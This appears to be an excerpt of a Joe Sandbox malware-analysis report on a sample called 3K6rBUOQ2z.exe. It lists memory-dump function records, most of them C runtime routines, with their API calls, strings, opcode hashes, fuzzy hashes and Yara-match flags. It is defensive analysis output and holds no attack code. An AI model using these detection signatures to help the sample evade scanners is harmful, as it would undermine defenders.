                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                    • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                    • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C:\Users\user\Desktop\3K6rBUOQ2z.exe$obA
                                                    • API String ID: 0-2627781642
                                                    • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                    • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                                    • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                    • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 0-537541572
                                                    • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                    • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                    • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                    • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 0-537541572
                                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                    • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                    • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                    • Instruction ID: d115a3c1556e8c7a8b1246ba41cab4f2983be82c3d72136885d86cadfd654bff
                                                    • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                    • Instruction Fuzzy Hash: 01119632741704B6F6A0F770CC06FCB7B9E6F00708F408818BB9966152D67DB545A761
                                                    APIs
                                                      • Part of subcall function 04B572B1: _free.LIBCMT ref: 04B572D6
                                                    • _free.LIBCMT ref: 04B57337
                                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                    • _free.LIBCMT ref: 04B57342
                                                    • _free.LIBCMT ref: 04B5734D
                                                    • _free.LIBCMT ref: 04B573A1
                                                    • _free.LIBCMT ref: 04B573AC
                                                    • _free.LIBCMT ref: 04B573B7
                                                    • _free.LIBCMT ref: 04B573C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                    • Instruction ID: f3638e34a91a9eb389efc8ebeddf53615fc296e693e6a5b1e9022694aa798f79
                                                    • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                    • Instruction Fuzzy Hash: C1117F31A50B08BAE920B7B1DC05FCBF79CEF05704F800858FBAD760B0DA66B5145660
                                                    APIs
                                                      • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                    • _free.LIBCMT ref: 1000C60D
                                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                    • _free.LIBCMT ref: 1000C618
                                                    • _free.LIBCMT ref: 1000C623
                                                    • _free.LIBCMT ref: 1000C677
                                                    • _free.LIBCMT ref: 1000C682
                                                    • _free.LIBCMT ref: 1000C68D
                                                    • _free.LIBCMT ref: 1000C698
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                    • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                    • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                    • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                    APIs
                                                      • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                                    • _free.LIBCMT ref: 004170D0
                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                    • _free.LIBCMT ref: 004170DB
                                                    • _free.LIBCMT ref: 004170E6
                                                    • _free.LIBCMT ref: 0041713A
                                                    • _free.LIBCMT ref: 00417145
                                                    • _free.LIBCMT ref: 00417150
                                                    • _free.LIBCMT ref: 0041715B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                    • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
                                                    • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                    • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 04B57F82
                                                    • __fassign.LIBCMT ref: 04B58161
                                                    • __fassign.LIBCMT ref: 04B5817E
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B581C6
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B58206
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B582B2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                    • String ID:
                                                    • API String ID: 4031098158-0
                                                    • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                    • Instruction ID: 8606dff038d5312d631dc210a50766c7e4134fa67084ac058c82fc762aa38f79
                                                    • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                    • Instruction Fuzzy Hash: ACD1C970E016489FDF11DFE8D880AEDFBB5FF48304F2840AAE815BB261D631A952CB50
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                                    • __fassign.LIBCMT ref: 00417EFA
                                                    • __fassign.LIBCMT ref: 00417F17
                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                    • String ID:
                                                    • API String ID: 4031098158-0
                                                    • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                    • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                                    • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                    • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                    • __fassign.LIBCMT ref: 1000B905
                                                    • __fassign.LIBCMT ref: 1000B922
                                                    • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 1735259414-0
                                                    • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                    • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                    • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                    • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,04B4B002,04B4A5C6,04B49C00), ref: 04B4B019
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B4B027
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B4B040
                                                    • SetLastError.KERNEL32(00000000,04B4B002,04B4A5C6,04B49C00), ref: 04B4B092
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                    • Instruction ID: 5d97d5de8773b9d009742cf9eef0d20d8d296e21d72a888fe39dd23c57b746e0
                                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                    • Instruction Fuzzy Hash: 9D01AC3270D3116FBB346FB47C849762B54EB8167A72102B9F724562E1EF59F8127144
                                                    APIs
                                                    • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                    • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                    • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                    • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                    • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                                    • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                    • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                    • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free_strpbrk
                                                    • String ID: *?
                                                    • API String ID: 3300345361-2564092906
                                                    • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                    • Instruction ID: 74ce9c3951af57ab81168c2b549ef3ab89f4257994a153330f65b8d48fe9ed26
                                                    • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                    • Instruction Fuzzy Hash: 26615075E00219AFDB14CFA9C8809EEFBF6EF48314B258169DA05E7301E775BE418B90
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free_strpbrk
                                                    • String ID: *?
                                                    • API String ID: 3300345361-2564092906
                                                    • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                    • Instruction ID: 1b74f13dbcba2150a1fd9868d0adae7fc2dc7661cc718da73cb4b4ef5f34790c
                                                    • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                    • Instruction Fuzzy Hash: 3E615F75E00219AFDF24DFA8C8806EDFBF5EF48314B1585AAE815F7354D631AE418B90
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free_strpbrk
                                                    • String ID: *?
                                                    • API String ID: 3300345361-2564092906
                                                    • Opcode ID: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                                    • Instruction ID: 08919aac2af5baaa0bc26bb502442345b411eba09a4371073371dd33b5eb5490
                                                    • Opcode Fuzzy Hash: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                                    • Instruction Fuzzy Hash: 34613F75E00619DFCB14CFA9C8815EEFBF5EF88354B24816AE815F7300E675AE818B94
                                                    Strings
                                                    • C:\Users\user\Desktop\3K6rBUOQ2z.exe, xrefs: 04B56388
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                    • API String ID: 0-2708042248
                                                    • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                    • Instruction ID: f552e073e65239589d6095b5991a64c7f020a132d82bace3d2b8a8f69f5e1887
                                                    • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                    • Instruction Fuzzy Hash: 7221D471600105BFEB20BF698C80E6BB7ADEF402A874185A4FD2DC7260E731FC519760
                                                    Strings
                                                    • C:\Users\user\Desktop\3K6rBUOQ2z.exe, xrefs: 1000833B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                    • API String ID: 0-2708042248
                                                    • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                    • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                    • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                    • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-
                                                    • API String ID: 3664257935-2084034818
                                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                    • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                    • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                    • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                    • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                    • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                    • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,771ADF80,?), ref: 0040EF64
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                                    • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,771ADF80,?), ref: 0040EF9A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                    • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                                    • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                    • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                                    APIs
                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                    • __alloca_probe_16.LIBCMT ref: 1000A736
                                                    • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                    • __freea.LIBCMT ref: 1000A837
                                                    • __freea.LIBCMT ref: 1000A843
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
